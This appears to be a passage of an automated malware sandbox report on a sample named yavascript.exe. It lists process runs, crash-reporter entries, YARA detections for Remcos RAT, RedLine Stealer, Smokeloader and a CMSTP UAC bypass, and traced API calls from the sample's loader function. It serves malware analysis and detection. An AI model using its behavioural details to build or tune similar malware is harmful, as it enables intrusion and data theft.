Author: Joe Security Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	07:52:21
Start date:	02/08/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 6464 -s 964
Imagebase:	0xe00000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	07:52:22
Start date:	02/08/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 6464 -s 1120
Imagebase:	0xe00000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	07:52:23
Start date:	02/08/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 6464 -s 1136
Imagebase:	0xe00000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	07:52:23
Start date:	02/08/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 6464 -s 1164
Imagebase:	0xe00000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	07:52:24
Start date:	02/08/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 6464 -s 1080
Imagebase:	0xe00000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	07:52:25
Start date:	02/08/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 6464 -s 1212
Imagebase:	0xe00000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	07:52:26
Start date:	02/08/2024
Path:	C:\Users\user\AppData\Roaming\yavascript.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\yavascript.exe"
Imagebase:	0x400000
File size:	365'568 bytes
MD5 hash:	41EDAD3DDF08BDF37CB05F98D91EA355
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000000F.00000002.4474590588.0000000000553000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000F.00000003.2285528324.0000000002180000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000F.00000003.2285528324.0000000002180000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000F.00000003.2285528324.0000000002180000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000000F.00000003.2285528324.0000000002180000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 0000000F.00000003.2285528324.0000000002180000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000F.00000002.4474045172.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000F.00000002.4474045172.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000F.00000002.4474045172.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Author: unknown Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000000F.00000002.4474045172.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Author: unknown Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 0000000F.00000002.4474045172.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Author: ditekSHen Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000F.00000002.4474688472.0000000000598000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000F.00000002.4474926226.0000000000730000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000F.00000002.4474926226.0000000000730000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000F.00000002.4474926226.0000000000730000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 0000000F.00000002.4474926226.0000000000730000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 76%, ReversingLabs Detection: 47%, Virustotal, Browse
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	17
Start time:	07:52:26
Start date:	02/08/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 6464 -s 988
Imagebase:	0xe00000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	07:52:33
Start date:	02/08/2024
Path:	C:\Users\user\AppData\Roaming\yavascript.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\yavascript.exe"
Imagebase:	0x400000
File size:	365'568 bytes
MD5 hash:	41EDAD3DDF08BDF37CB05F98D91EA355
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000014.00000002.2463964388.000000000061C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000014.00000002.2463923706.00000000005D8000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000014.00000002.2463449959.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000014.00000002.2463449959.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000014.00000002.2463449959.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Author: unknown Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000014.00000002.2463449959.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Author: unknown Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000014.00000002.2463449959.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Author: ditekSHen Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000014.00000003.2434483008.0000000002000000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000014.00000003.2434483008.0000000002000000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000014.00000003.2434483008.0000000002000000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000014.00000003.2434483008.0000000002000000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000014.00000003.2434483008.0000000002000000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000014.00000002.2464609344.0000000001F80000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000014.00000002.2464609344.0000000001F80000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000014.00000002.2464609344.0000000001F80000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000014.00000002.2464609344.0000000001F80000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	07:52:39
Start date:	02/08/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 2604 -s 880
Imagebase:	0xe00000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	07:52:40
Start date:	02/08/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 2604 -s 424
Imagebase:	0xe00000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	07:52:41
Start date:	02/08/2024
Path:	C:\Users\user\AppData\Roaming\yavascript.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\yavascript.exe"
Imagebase:	0x400000
File size:	365'568 bytes
MD5 hash:	41EDAD3DDF08BDF37CB05F98D91EA355
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001A.00000002.2513171339.000000000086C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000001A.00000002.2513143474.0000000000828000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001A.00000002.2513046980.0000000000730000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000001A.00000002.2513046980.0000000000730000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000001A.00000002.2513046980.0000000000730000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 0000001A.00000002.2513046980.0000000000730000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001A.00000002.2512850623.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000001A.00000002.2512850623.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000001A.00000002.2512850623.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Author: unknown Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000001A.00000002.2512850623.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Author: unknown Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 0000001A.00000002.2512850623.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Author: ditekSHen Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001A.00000003.2499743476.00000000021C0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000001A.00000003.2499743476.00000000021C0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000001A.00000003.2499743476.00000000021C0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000001A.00000003.2499743476.00000000021C0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 0000001A.00000003.2499743476.00000000021C0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	07:52:42
Start date:	02/08/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 2604 -s 900
Imagebase:	0xe00000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	07:52:43
Start date:	02/08/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 2604 -s 916
Imagebase:	0xe00000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	07:52:44
Start date:	02/08/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 2604 -s 876
Imagebase:	0xe00000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	07:52:45
Start date:	02/08/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 2604 -s 948
Imagebase:	0xe00000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	36
Start time:	07:52:47
Start date:	02/08/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 2604 -s 904
Imagebase:	0xe00000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	38
Start time:	07:52:48
Start date:	02/08/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 2604 -s 976
Imagebase:	0xe00000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	1.5%
Dynamic/Decrypted Code Coverage:	2.5%
Signature Coverage:	22.1%
Total number of Nodes:	1137
Total number of Limit Nodes:	22

Executed Functions

Function 0041CB50 Relevance: 148.9, APIs: 52, Strings: 33, Instructions: 176
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE(Psapi,GetProcessImageFileNameW,?,?,?,?,0040E9E1), ref: 0041CB65
GetProcAddress.KERNEL32(00000000), ref: 0041CB6E
GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040E9E1), ref: 0041CB85
GetProcAddress.KERNEL32(00000000), ref: 0041CB88
LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040E9E1), ref: 0041CB9A
GetProcAddress.KERNEL32(00000000), ref: 0041CB9D
LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040E9E1), ref: 0041CBAE
GetProcAddress.KERNEL32(00000000), ref: 0041CBB1
LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040E9E1), ref: 0041CBC3
GetProcAddress.KERNEL32(00000000), ref: 0041CBC6
LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040E9E1), ref: 0041CBD2
GetProcAddress.KERNEL32(00000000), ref: 0041CBD5
GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040E9E1), ref: 0041CBE6
GetProcAddress.KERNEL32(00000000), ref: 0041CBE9
GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040E9E1), ref: 0041CBFA
GetProcAddress.KERNEL32(00000000), ref: 0041CBFD
LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040E9E1), ref: 0041CC0E
GetProcAddress.KERNEL32(00000000), ref: 0041CC11
GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040E9E1), ref: 0041CC22
GetProcAddress.KERNEL32(00000000), ref: 0041CC25
GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040E9E1), ref: 0041CC36
GetProcAddress.KERNEL32(00000000), ref: 0041CC39
GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040E9E1), ref: 0041CC4A
GetProcAddress.KERNEL32(00000000), ref: 0041CC4D
GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040E9E1), ref: 0041CC5E
GetProcAddress.KERNEL32(00000000), ref: 0041CC61
GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040E9E1), ref: 0041CC72
GetProcAddress.KERNEL32(00000000), ref: 0041CC75
LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040E9E1), ref: 0041CC83
GetProcAddress.KERNEL32(00000000), ref: 0041CC86
LoadLibraryA.KERNEL32(kernel32,GetConsoleWindow,?,?,?,?,0040E9E1), ref: 0041CC97
GetProcAddress.KERNEL32(00000000), ref: 0041CC9A
GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040E9E1), ref: 0041CCA7
GetProcAddress.KERNEL32(00000000), ref: 0041CCAA
GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0040E9E1), ref: 0041CCB7
GetProcAddress.KERNEL32(00000000), ref: 0041CCBA
LoadLibraryA.KERNELBASE(Iphlpapi,GetExtendedTcpTable,?,?,?,?,0040E9E1), ref: 0041CCCC
GetProcAddress.KERNEL32(00000000), ref: 0041CCCF
LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedUdpTable,?,?,?,?,0040E9E1), ref: 0041CCDC
GetProcAddress.KERNEL32(00000000), ref: 0041CCDF
GetModuleHandleA.KERNEL32(ntdll,NtQueryInformationProcess,?,?,?,?,0040E9E1), ref: 0041CCF0
GetProcAddress.KERNEL32(00000000), ref: 0041CCF3
GetModuleHandleA.KERNEL32(kernel32,GetFinalPathNameByHandleW,?,?,?,?,0040E9E1), ref: 0041CD04
GetProcAddress.KERNEL32(00000000), ref: 0041CD07
LoadLibraryA.KERNELBASE(Rstrtmgr,RmStartSession,?,?,?,?,0040E9E1), ref: 0041CD19
GetProcAddress.KERNEL32(00000000), ref: 0041CD1C
LoadLibraryA.KERNEL32(Rstrtmgr,RmRegisterResources,?,?,?,?,0040E9E1), ref: 0041CD29
GetProcAddress.KERNEL32(00000000), ref: 0041CD2C
LoadLibraryA.KERNEL32(Rstrtmgr,RmGetList,?,?,?,?,0040E9E1), ref: 0041CD39
GetProcAddress.KERNEL32(00000000), ref: 0041CD3C
LoadLibraryA.KERNEL32(Rstrtmgr,RmEndSession,?,?,?,?,0040E9E1), ref: 0041CD49
GetProcAddress.KERNEL32(00000000), ref: 0041CD4C

Strings

GetProcessImageFileNameW, xrefs: 0041CB5A, 0041CB5F, 0041CB7F
kernel32, xrefs: 0041CBCD, 0041CBDC, 0041CBF0, 0041CC18, 0041CC68, 0041CC8D, 0041CCFA
GetComputerNameExW, xrefs: 0041CBEB
RmStartSession, xrefs: 0041CD09
Rstrtmgr, xrefs: 0041CD0E, 0041CD18, 0041CD23, 0041CD33, 0041CD43
Kernel32, xrefs: 0041CB80
SetProcessDpiAwareness, xrefs: 0041CB8F, 0041CB94, 0041CBA8
NtSuspendProcess, xrefs: 0041CC9C
GetExtendedTcpTable, xrefs: 0041CCBC
RmGetList, xrefs: 0041CD2E
GetFinalPathNameByHandleW, xrefs: 0041CCF5
RmRegisterResources, xrefs: 0041CD1E
GetSystemTimes, xrefs: 0041CC63
GetMonitorInfoW, xrefs: 0041CC4F
IsWow64Process, xrefs: 0041CBD7
EnumDisplayMonitors, xrefs: 0041CC3B
GetExtendedUdpTable, xrefs: 0041CCD1
Psapi, xrefs: 0041CB60
NtQueryInformationProcess, xrefs: 0041CCE1
GlobalMemoryStatusEx, xrefs: 0041CBC8
Iphlpapi, xrefs: 0041CCC1, 0041CCCB, 0041CCD6
IsUserAnAdmin, xrefs: 0041CBFF
Shlwapi, xrefs: 0041CC79
shcore, xrefs: 0041CB95
user32, xrefs: 0041CBA9, 0041CC2C, 0041CC40, 0041CC54
NtUnmapViewOfSection, xrefs: 0041CBB8
SetProcessDEPPolicy, xrefs: 0041CC13
ntdll, xrefs: 0041CBBD, 0041CBC2, 0041CCA1, 0041CCB1, 0041CCE6
EnumDisplayDevicesW, xrefs: 0041CC27
RmEndSession, xrefs: 0041CD3E
GetConsoleWindow, xrefs: 0041CC88
Shell32, xrefs: 0041CC04
NtResumeProcess, xrefs: 0041CCAC

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad$HandleModule
String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetFinalPathNameByHandleW$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtQueryInformationProcess$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$RmEndSession$RmGetList$RmRegisterResources$RmStartSession$Rstrtmgr$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
API String ID: 4236061018-3687161714
Opcode ID: d30ec231acb52cdcc59a2b6b3fe3a558d95728f00a5c8bab653e1e11384c1c5d
Instruction ID: 43d5c3d51f8f0173c8b3474e0c84bdc355f07b7b5b23ff39ae26555794408ecb
Opcode Fuzzy Hash: d30ec231acb52cdcc59a2b6b3fe3a558d95728f00a5c8bab653e1e11384c1c5d
Instruction Fuzzy Hash: 31419EA0EC035879DA107BB66DCDE3B3E5CD9857953214837B15CA7150EBBCD8408EAE

Function 0040E9C5 Relevance: 84.8, APIs: 14, Strings: 34, Instructions: 795
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0041CB50: LoadLibraryA.KERNELBASE(Psapi,GetProcessImageFileNameW,?,?,?,?,0040E9E1), ref: 0041CB65
Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CB6E
Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040E9E1), ref: 0041CB85
Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CB88
Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040E9E1), ref: 0041CB9A
Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CB9D
Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040E9E1), ref: 0041CBAE
Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CBB1
Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040E9E1), ref: 0041CBC3
Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CBC6
Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040E9E1), ref: 0041CBD2
Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CBD5
Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040E9E1), ref: 0041CBE6
Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CBE9
Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040E9E1), ref: 0041CBFA
Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CBFD
Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040E9E1), ref: 0041CC0E
Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC11
Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040E9E1), ref: 0041CC22
Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC25
Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040E9E1), ref: 0041CC36
Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC39
Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040E9E1), ref: 0041CC4A
Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC4D
Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040E9E1), ref: 0041CC5E
Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC61
Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040E9E1), ref: 0041CC72
Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC75
Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040E9E1), ref: 0041CC83

